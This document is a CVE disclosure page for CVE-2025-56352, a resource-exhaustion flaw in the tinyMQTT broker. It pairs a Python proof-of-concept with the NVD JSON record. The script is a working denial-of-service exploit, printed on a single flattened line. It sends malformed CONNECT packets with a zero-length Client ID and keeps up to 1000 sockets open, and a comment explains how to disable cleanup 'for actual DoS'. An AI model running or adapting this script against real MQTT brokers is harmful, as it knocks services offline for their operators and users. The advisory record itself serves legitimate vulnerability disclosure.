CVE-2025-56352

import socket import time # Target configuration TARGET_IP = "127.0.0.1" TARGET_PORT = 1883 COUNT = 1000 def create_malicious_packet(): """ Creates a CONNECT packet with CleanSession=0 and Zero-length Client ID. This violates the MQTT protocol but triggers the resource leak in tinyMQTT. """ # Fixed Header: Message Type CONNECT (1), Reserved (0) -> 0x10 header = bytes([0x10]) # Variable Header protocol_name = b'\x00\x04MQTT' # Protocol Name: MQTT protocol_level = bytes([0x04]) # Protocol Level: 4 (3.1.1) # Connect Flags: 0x00 (Clean Session = 0) connect_flags = bytes([0x00]) keep_alive = b'\x00\x3C' # Keep Alive: 60 # Payload # Client Identifier Length: 0x0000 (Zero length) client_id_len = b'\x00\x00' client_id = b'' payload = client_id_len + client_id # Remaining Length calculation # Protocol Name (6) + Level (1) + Flags (1) + Keep Alive (2) + Payload (2) = 12 remaining_length = bytes([0x0C]) return header + remaining_length + protocol_name + protocol_level + connect_flags + keep_alive + payload print(f"[*] Starting DoS attack against {TARGET_IP}:{TARGET_PORT}...") print("[!] This will attempt to exhaust file descriptors.") sockets = [] packet = create_malicious_packet() try: for i in range(COUNT): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) try: s.connect((TARGET_IP, TARGET_PORT)) s.send(packet) # Do not close the socket! This consumes the file descriptor. sockets.append(s) print(f"[+] Sent packet {i+1}, socket left open.") except Exception as e: print(f"[-] Failed at iteration {i+1}: {e}") break except KeyboardInterrupt: print("\n[!] Stopping attack.") finally: # Cleanup sockets for testing purposes (comment out for actual DoS) for s in sockets: s.close() print("[*] Sockets closed.")

{"cve": {"id": "CVE-2025-56352", "sourceIdentifier": "[email protected]", "published": "2026-05-18T16:16:29.130", "lastModified": "2026-05-18T20:27:23.023", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In tinyMQTT commit 6226ade15bd4f97be2d196352e64dd10937c1962 (2024-02-18), the broker mishandles protocol violations during CONNECT packet parsing. When receiving a CONNECT packet with a zero-length Client ID while CleanSession is set to 0, the broker correctly replies with a CONNACK return code 0x02 (Identifier Rejected) but fails to explicitly close the TCP connection. Since the surrounding connection teardown logic is not guaranteed to execute, each such invalid CONNECT attempt leaves the underlying socket open. Repeated attempts cause server-side resource exhaustion due to accumulating file descriptors and memory usage, potentially resulting in denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://github.com/JustDoIt0910/tinyMQTT/issues/19", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/21207896/Resource_Exhaustion_Poc.txt", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}